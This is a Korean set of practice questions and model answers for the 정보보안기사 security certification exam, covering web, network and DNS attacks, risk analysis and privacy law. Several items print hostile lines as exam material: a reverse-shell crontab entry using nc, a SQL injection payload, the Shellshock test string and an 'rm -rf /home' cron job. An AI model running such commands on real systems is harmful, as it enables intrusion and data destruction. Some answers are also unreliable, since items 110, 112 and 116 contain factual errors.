저장소

카테고리 자격증

태그

#exam #security #exam #practical

101번

문제

특정 웹 페이지에 실행 가능한 스크립트를 삽입하여 페이지 방문자의 개인정보나 쿠키정보를 탈취하여 전송하는 공격 및 동작 원리, 이를 공격을 보안하기 위한 방안을 서술하시오.

답

1) XSS 공격 정의 : 웹페이지에 악의적인 스크립트를 포함시켜 사용자 측에서 실행되도록 유도함으로써 이득을 취하는 공격

2) XSS 공격 기법 2 가지 2-1) Reflected XSS : 검색 결과, 에러 메시지 등을 통해 서버가 외부에서 입력 받은 악성 스크립트가 포함된 URL 파라미터 값을 사용자 브라우저에서 응답하도록 허용할 때 발생한다. 공격 스크립트가 삽입된 URL 을 사용자가 쉽게 확인할 수 없도록 변형하여, 이메일, 메신저, 파일 등을 통해 실행을 유도하는 기법이다. 2-2) Stored XSS : 웹 사이트의 게시판, 코멘트 필드, 사용자 프로필 등의 입력 Form 을 통해 악성 스크립트를 삽입하여 DB 저장한다. 이후 사용자가 사이트를 방문하여 저장된 페이지(예:게시글)를 열람할 때, 저장된 악성 스크립트가 로딩되어 사용자 브라우저에서 실행되도록 하는 기법이다. 2-3) DOM based XSS : 외부에서 입력 받은 악성 스크립트가 포함된 URL 파라미터 값이 서버를 거치지 않고, DOM 생성의 일부로 실행되면서 공격이 이루어진다.

3) XSS 대응방안 3-1) 웹 서버에서 입력 값에 정의된 문자 길이를 제한 또는 검증하여 클라이언트 측에서 실행될 수 있는 스크립트 명령이 삽입되지 않도록 설정한다. 3-2) HTML 태그의 사용이 불필요한 경우 사용자의 입력 값에서 HTML 특수 문자들을 HTML Entity 로 변환하여 스크립트를 일반 문자열로 인식되도록 한다. 3-3) 부득이하게 HTML 태그를 반드시 사용해야 할 경우에는 블랙리스트 또는 화이트리스트 방식을 이용해 반드시 사용해야만 하는 특정 태그만 사용할 수 있도록 설정한다. 3-4) 웹 방화벽(WAF, Web Application Firewall) 를 사용하여 비정상적인 데이터가 전송될 경우 차단한다.

102번

문제

답

a.bat, msnsrv.exe, wassa.exe 파일 생성
시스템 기동 시 자동 실행되도록 레지스트리 값 추가
탐색기의 Hidden 속성의 파일 보이기 속성 해제
커맨드 셀 cmd.exe 를 레지스트리에서 삭제
커맨드 셀 실행 시에 msnsrv.exe 가 실행되도록 레지스트리 추가
윈도우 방화벽에서 TCP 포트 9070 을 허용

103번

문제

위험분석모델 중 복합적 모델 접근방법의 장단점을 기술하시오.

답

장점: 비용과 자원을 효율적으로 사용할 수 있음. 고위험 영역을 빠르게 식별 가능
단점: 고위험 영역에 잘못 식별되었을 경우, 위험분석 비용이 낭비되거나 부적절하게 대응될 수 있음

104번

문제

다음 결과에 대해 답하시오.

(1) 어떤 유형의 공격인가?

(2) 공격대상은 무엇인가?

(3) HTTP 상태코드 값이 200 으로 출력되었다. 공격은 성공했는지 여부와 성공의 판단 근거를 서술하시오.

답

(1) 디렉터리 리스팅

(2) 웹 서버 (192.168.0.10)

(3) 공격은 성공으로 판단됨. HTTP 200 OK 응답 코드를 통해 정상적으로 브라우저에 디렉터리 리스팅 정보가 출력된 것을 알 수 있다.

105번

문제

다음은 DNS 서버로 zone-transfer 를 시도한 결과이다. 각 질문에 답하시오. #dig @NS1.abc.COM def.com axfr

; «» DIG 9.2.1 «» @NS1.abc.COM def.com axfr ; global options: print cmd Transfer failed

#dig @NS2.abc.COM def.com axfr

xxxx.com. 1800 IN SOA ns1.xxxx.com hostmaster.ns1.abc.com xxxx.com 1800 IN MX 5 mail4.xxxx.com, xxxx.com 1800 IN MX 5 mail5.xxxx.com xxxx.com 1800 IN A 211.xx.xx.xx

(1) 1 차 네임서버의 zone-transfer 의 상태를 설명하시오.

(2) 2 차 네임서버는 이렇게도 다양한 정보를 보여주고 있다. zone -transfer 관련 보안 위험요소는 무엇이 있는 지 설명하시오.

(3) zone-transfer 보안 위험성 대응책은 무엇인지 기술하시오.

답

(1) 1 차 네임서버는 zone-transfer 응답을 하고 있지 않아 정보를 알아내는 데 실패

(2) 공격자는 간단한 방법으로 내부의 시스템/네트워크 구조를 쉽게 파악할 수 있다. • 사내 IP 대역이나 보안장비 IP 도 노출 • zone-transfer 시도에 zone 파일 크기에 따라 과도한 트래픽을 유발할 수 있어 서비스 거부로 악용될 수 있다.

(3) zone transfer 가 필요 없을 경우 비활성 시킴

106번

문제

IPSec 의 기능을 4 가지 이상 기술하시오.

답

(1) 데이터 기밀성: ESP 프로토콜의 payload 암호화를 통해 메시지가 제 3 자에 의해 도청되어도 그 내용이 노출되지 않음을 보장

(2) 비연결성 무결성: AH 정보를 통해 비연결형 통신 데이터의 무결성 보장

(3) 데이터 근원지 인증: 송신자와 수신자만 공유한 키를 통해 메시지 발송자가 송신자인지 식별 및 인증 가능

(4) 재생공격보호: IPSec 헤더의 Sequence Number 필드를 통해 재생 공격 방어

(5) 제한된 트래픽 흐름의 비밀성: 원본 IP 헤더 값을 암호화 시키는 경우 출발지/목적지 주소 은닉 가능

107번

문제

웹 서버에서 다음과 같은 SQL SELECT 문이 수행된다고 할 때 아래의 항목에 대해서 설명하시오. SELECT password FROM user WHERE username=’qfrankr’

(1) 쿼리의 결과는 무엇인가?

(2) 모든 사용자의 정보를 획득하기 위해 ‘qfrankr’ 부분에 들어갈 예시를 작성하시오.

(3) 위 예시가 가능한 이유는 무엇인가?

답

(1) qfrankr 사용자에 대한 패스워드 정보를 확인한다.

(2) ‘ or ‘a’=’a 또는 ‘ or ‘1’=’1 등 조건절을 참으로 만드는 다양한 조건값이 가능.\

(3) 조건절이 WHERE username=’’ or ‘1’=’1’이 되므로 항상 결과가 참이 된다.

108번

문제

DNS 증폭 공격(DNS Amplification DDoS Attack) 중 IP 기반 공격에 대해 설명하고 IP 기반 공격을 사용하는 이유와 사용하는 레코드 type 을 기술하시오.

답

IP 기반 DNS 증폭 공격기법: IP Spoofing 을 사용하여 출발지(Source) IP 를 공격하고자 하는 희생자(victim)서버의 IP 로 위조한 후 다수의 DNS 질의를 수행한다
증폭 이유: 공격자의 DNS 질의에 대한 응답 패킷을 IP Spoofing 된 희생자 서버가 수신하게 되므로 서비스거부 공격 가능
DNS 질의 타입: ANY 타입 or TXT 레코드 타입
해당 레코드 타입 사용 이유: any 또는 txt type 의 경우 요청하는 패킷의 크기와 응답 패킷 크기가 비대칭적으로 응답 패킷 사이즈가 크게 때문에 작은 컴퓨팅 리소스로 효율적인 공격이 가능

109번

문제

다음은 공격상황의 패킷을 캡처한 결과이다. 그림을 보고 다음 물음에 답하시오.

(1) 어떤 공격인가?

(2) 어떤 현상이 발생하며, 그 이유는 무엇인가?

(3) 대응 방법은 무엇인가?

답

(1) Slow HTTP Header DoS(Slowloris) 공격

(2) 서비스가 느려지고 새로운 정상 접속요청이 거부된다.

요청 헤더 부분을 비정상적으로 조작, 불필요한 헤더정보를 천천히 지속적으로 전달하여 웹서버가 헤더 정보를 완전히 수신할 때까지 연결을 장시간 유지한다.
웹서버가 동시에 연결상태(HTTP 연결상태)를 유지할 수 있는 자원은 제한적이며, 다수의 연결상태가 비정상적으로 지속되면 정상적인 사용자의 서비스 접속이 어려워진다.

(3) 공격자가 동시에 많은 연결상태(세션)를 유지하므로 이를 차단하기 위해 서버방화벽 등을 이용하여 동시 연결에 대한 임계치 제한을 설정한다.

110번

문제

게이트웨이의 IP 주소가 172.111.11.10 이고 MAC 주소가 11-22-33-44-55-66 인 환경에서 다음 커맨드에 출력된 내용을 참고하여 어떤 유형의 공격인지 판단하고 판단 근거 및 대응방안을 서술하시오.

172.111.11.1 11-22-33-44-55-66 Dynamic

172.111.11.2 ab-bc-cd-de-ef-ff Dynamic

172.111.11.3 11-22-33-44-55-66 Dynamic

172.111.22.2 xx-yy-zz-11-22-33 Dynamic

답

(1) 공격유형: ARP Spoofing

(2) 판단근거: 172.111.11.30 / 172.111.11.1 과 같은 MAC 주소를 가지고 있다.

(3) 대응방안

ARP Cache Table 정보를 정적(static)으로 설정하여 ARP 프로토콜을 통한 변조가 발생하지 않도록 함
ARP -s [게이트웨이 IP] [게이트웨이 MAC 주소]

111번

문제

다음 문제에서 요구하는 사항에 답하시오 (A) 스머프 공격의 원리를 설명하고, (B) 방화벽이나 IDS 없이 막을 수 있는 방법을 기술하라.

답

(A) 공격 대상 호스트로 위조한 ICMP 패킷을 브로드캐스트하면 근처의 호스트가 다량의 Echo Reply 를 발생시킨다.

(B) 라우터 외부에서 들어오는 IP directed Broadcast 패킷 차단, host= ip broadcast 로 전송된 ICMP 패킷 응답하지 않도록 설정

112번

문제

다음은 위험분석에 대한 설명이다. 요구하는 각 항목에 답하시오.

(1) SLE 이란 무엇인가?

(2) SLE 를 구하는 식을 적으시오.

(3) ALE 를 구할 때 SLE 를 제외하고 필요한 것은 무엇인가?

(4) 위험을 완전히 제거하는 연간비용이 X 라고 할 때 ROI 는?

답

(1) 연간손실액

(2) SLE = AV(자산가치) * EF(자산의 손실액)

(3) ARO(연간발생률)

(4) ALE-X=ROI (보안투자비용은 ALE 보다 작아야 한다.)

113번

문제

개인정보 보호법에 따라 개인정보처리자는 개인정보가 분실ㆍ도난ㆍ유출(이하 이 조에서 “유출 등”이라 한다)되었음을 알게 되었을 때에는 지체 없이 해당 정보주체에게 다음 각 호의 사항을 알려야 한다. 이때 알려야 할 사항 5 가지를 기술하시오.

답

(1) 유출 등이 된 개인정보의 항목

(2) 유출 등이 된 시점과 그 경위

(3) 유출 등으로 인하여 발생할 수 있는 피해를 최소화하기 위하여 정보주체가 할 수 있는 방법 등에 관한 정보

(4) 개인정보처리자의 대응조치 및 피해 구제절차

(5) 정보주체에게 피해가 발생한 경우 신고 등을 접수할 수 있는 담당부서 및 연락

114번

문제

crontab 스케줄러 내용 분석하라. 0 * * * * /bin/cp /tmp/passwd1 /etc/passwd 0 0 12 * * root /usr/bin/nc 10.10.10.10 80 -e /bin/bash

답

임의로 조작된 passwd1 파일이 원래 passwd 파일을 덮어쓴다.
10.10.10.10 호스트에 80 포트로 연결한다. 리버스쉘의 위험이 있다.

115번

문제

Source PORT: 443, Destination PORT: 80 일 때 아래 HTTP Request 분석하라.
GET /login.php HTTP/1.1
Host: test.com

Connection: keep-alive Cookie: sEsz4sH5bChIslfOeJgjXdi== Pragma: no-cache Cache-Control: must-revalidate Content-length: 32

id=admin&password=1234&act=login

답

Cache-control 에서 must-revalidate 설정으로 캐시서버를 사용하고 있지 않아 부하를

일으킬 가능성이 있다. • 전달 파라미터로 넘긴 내용에 id 와 password 등의 내용은 스니핑, 도청의 민감한 정보 유출에 위험이 있다. • 쿠키 값을 노출시키고 있다. • 443 포트 접속을 80 포트로 접속하고 있다.

116번

문제

다음 지문을 보고 질문에 답하시오. OpenSSL 의 보안결함을 발견하고 이를 이슈화 하기 위하여 HeartBleed 이름을 붙였다. 그 이후에 본문에 나타난 심각한 취약점의 미국 국립표준기술연구소(NIST)는 하트블리드 취약점보다 높은 최고 점수 10 점을 선정하여 발표하였고 (A)라는 이름을 붙였다. $ env x=’() { :;}; echo vulnerable’ bash -c “echo this is a test”

(1) (A)의 이름을 쓰시오.

(2) A 취약점의 발생 이유를 설명하시오.

(3) 위 로그를 보고 어떠한 행위를 하고 있는지 설명하시오.

답

(1) ShellShock (쉘 쇼크)

(2) Bash 셸이 제공하는 함수 선언기능에서 취약점이 발견

(3) 공격자가 서버에 포트를 열어놓고 피해자의 서버에 명령어를 전달하여 접속하도록 유도하는 리버스 쉘 연결한다.

117번

문제

다음 보기는 웹 공격에 대한 설명이다. 주어진 질문에 서술하시오. 파일 업로드 취약점을 파일을 첨부할 수 있는 게시판에 일반적으로 허용된(이미지 파일, 워드 파일) 이외의 악의적인 스크립트가 포함된 소스파일로 필터링 없이 첨부할 수 있게 되면 악의적인 공격자는 악성 스크립트를 이용한 서버에서 쉘을 획득하여 명령어를 실행할 수 있게 된다.

(1) 위 업로드의 취약점의 발생 원인은 무엇인가?

(2) 대응방안을 설명하시오.

답

(1) 악성스크립트가 첨부된 파일을 게시판에 업로드에 성공되면 업로드 공격에 취약

(2) 업로드 파일명 확장자 필터링 정책 / 업로드 파일 저장 디렉터리 따로 생성 서버 실행권한 제거

118번

문제

보안관제 업무시 사고발생 후 시행되는 디지털포렌식의 기본 원칙 중 연계 보관성의 원칙을 서술하고 각 단계를 설명하시오.

답

증거물의 수집, 이동, 보관, 분석, 법정 제출의 각 단계에서 담당자 및 책임자가 명확해야 함.
증거 채택 후 이송/분석/보관/법정 제출이라는 일련의 과정이 명확해야 하며 추적가능 해야 함.

119번

문제

다음 보기를 보고 주어진 질문에 알맞은 내용을 서술하시오. 통신 구간 암호화를 위해 많이 사용하는 OpenSSL 라이브러리에서 서버에 저장된 중요 메모리 데이터가 노출되는 (A) 보고서 명명된 심각한 버그가 발견되어 시스템 및 소프트웨어에 대한 신속한 취약점 조치를 권고한다.

(1) 취약점명은 무엇인가?

(2) 영향을 받는 버전은 무엇인가?

(3) 대응방법은 무엇인가?

답

(1) OpenSSL Heartbleed 취약점

(2) OpenSSL 1.0.1 ~ OpenSSL 1.0.1f, OpenSSL 1.0.2.beta ~ OpenSSL 1.0.2-beta1

(3) 최신버전 UPDATE

120번

문제

다음은 Crontab 에 대한 설명이다. 주어진 질문에 알맞은 답을 서술하시오. Crontab 은 리눅스에서 스케줄링하여 원하는 시간에 작업을 수행할 수 있는 유용한 유틸리티이다. 각 사용자별로 crontab 파일을 가지게 되며 cron job scheduler 가 지정된 시간에 주기적으로 지정된 파일을 실행해 준다.

(1) Cron 으로 현재 작업되어 있는 내용을 보는 명령어는?

(2) SIS 계정의 crontab 을 편집하는 방법은 무엇인가?

(3) 매주 일요일 새벽 3 시에 rm -rf 명령어를 이용하여 /home 디렉터리 하위 모든 파일과 디렉터리를 삭제하는 작업을 등록하라.

답

(1) crontab -l

(2) crontab -u sis -e

(3) 0 3 * * 0 rm -rf /home/ 1> /dev/null 2> &1*

[정보보안기사] 서술형6